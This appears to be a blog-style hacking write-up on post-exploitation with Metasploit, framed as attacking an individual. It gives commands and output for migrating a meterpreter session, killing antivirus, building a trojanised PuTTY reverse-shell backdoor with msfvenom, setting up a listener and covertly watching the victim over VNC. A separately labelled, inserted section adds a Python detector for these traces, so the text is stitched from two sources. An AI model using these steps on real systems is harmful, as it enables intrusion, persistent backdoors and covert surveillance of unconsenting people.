What to do after getting into the system?

Hello you all amazing hackers #xssrat

Before starting: do not use this knowledge to harm people. It is not good, and it can also backfire on you. In this write-up, we will attack an individual.

Why I am making this: when we start hacking, a lot of people will tell you how to exploit a Windows or Linux system, but after exploiting it, what should you do? No one tells you. So today you will learn what to do after exploiting a system and how to do it. I will be focusing heavily on MSF for this. # If I forgot something, please let me know. # This is my first write-up; I hope you like it.

Topics :

1.Scan the network :

You can scan a network with Nmap or similar tools. We can also run Nmap from inside MSF. When the scan finishes, we can try to go after new users.

msf > db_driver

msf > db_connect

msf > db_nmap

Now you can show your Nmap skills in this.

2.Migrating the exploit :

After we exploit the system, the user can end the session just by closing the app or browser, and then we lose our session to the target. To avoid this, we migrate to another process on the system. You should use a process that stays open for a long time.

meterpreter > run post/windows/manage/migrate

[*] Running module against V-MAC-XP

[*] Current server process: revterp.exe (243)

[*] Migrating to explorer.exe…

[*] Migrating into process ID 816

[*] New server process: Explorer.EXE (811)

3.Kill antivirus :

Antivirus is software that can give us trouble later when we try to install our backdoors on the system. We will kill it with a single command.

meterpreter > run killav

[*] Killing Antivirus services on the target…

[*] Killing off cmd.exe…

[*] Killing off cmd.exe…

4.Install backdoor:

The backdoor will help us reconnect to the system even if we lose the session to the target. To install a backdoor, we first need to download one.

i.Backdoor: wget http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe (put this in your root directory, /root)

ii.msf exploit : msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=IP LPORT=PORT > evilputty.exe

iii.start msfconsole

iv.use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST IP

set LPORT PORT

exploit

5.Watch user :

After doing all of the above, we can watch what the user is doing. It is a little creepy to watch others; if you don't want to do this, it's your choice. # Don't do anything harmful to others.

meterpreter > run vnc

[*] Creating a VNC reverse tcp stager: LHOST=IP LPORT=PORT)

[*] Running payload handler

[*] VNC stager executable 37888 bytes long

[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\CTDWtQC.exe (must be deleted manually)

[*] Executing the VNC agent with endpoint IP: PORT…

[*] VNC Server session 2 opened (IP:PORT -> IP:PORT)
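Seen from the defender's side, steps 2, 3 and 5 leave traces: a shell process such as explorer.exe holding an outbound connection, security processes that stop and do not come back, and an executable run from C:\WINDOWS\TEMP. The following is an added example, not part of the original write-up, that runs three simple checks over constructed log lines; the log format, the ExampleAV process names, the addresses and the thresholds are all assumptions made for illustration.

```python
import ntpath

# Constructed sample events (ts|event|image|detail); not real telemetry.
SAMPLE = r"""
100|create|C:\WINDOWS\system32\notepad.exe|
130|connect|C:\WINDOWS\Explorer.EXE|203.0.113.7:4444
140|terminate|C:\Program Files\ExampleAV\exampleav.exe|
150|terminate|C:\Program Files\ExampleAV\avupdate.exe|
155|create|C:\Program Files\ExampleAV\avupdate.exe|
200|create|C:\WINDOWS\TEMP\CTDWtQC.exe|
210|connect|C:\Program Files\Browser\browser.exe|198.51.100.9:443
"""

WATCHED = {"exampleav.exe", "avupdate.exe"}  # hypothetical security product processes
SHELL_PROCS = {"explorer.exe"}               # rarely open raw outbound sockets themselves
USUAL_PORTS = {80, 443}                      # assumed baseline for this host
RESTART_WINDOW = 60                          # seconds a stopped agent has to come back


def parse(text):
    """Yield (timestamp, event, image path, detail) from pipe-separated lines."""
    for line in text.strip().splitlines():
        ts, event, image, detail = line.split("|")
        yield int(ts), event, image, detail


def detect(text):
    """Return (timestamp, rule, evidence) tuples in log order."""
    events = list(parse(text))
    alerts = []
    for ts, event, image, detail in events:
        name = ntpath.basename(image).lower()
        folder = ntpath.dirname(image).lower()
        if event == "create" and folder.endswith("\\temp") and name.endswith(".exe"):
            alerts.append((ts, "exe-run-from-temp", image))
        elif event == "connect" and name in SHELL_PROCS:
            port = int(detail.rsplit(":", 1)[1])
            if port not in USUAL_PORTS:
                alerts.append((ts, "shell-process-outbound", detail))
        elif event == "terminate" and name in WATCHED:
            # A normal update restarts the agent; a killed one stays down.
            restarted = any(e == "create" and ntpath.basename(i).lower() == name
                            and ts < t <= ts + RESTART_WINDOW for t, e, i, _ in events)
            if not restarted:
                alerts.append((ts, "security-process-stopped", image))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

The port and restart-window rules are heuristics and need tuning against a host's normal behaviour before they are useful as alerts.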

#end

If you want to learn more about MSF, then read this book; it will help you a lot:

Metasploit The Penetration Tester’s Guide:
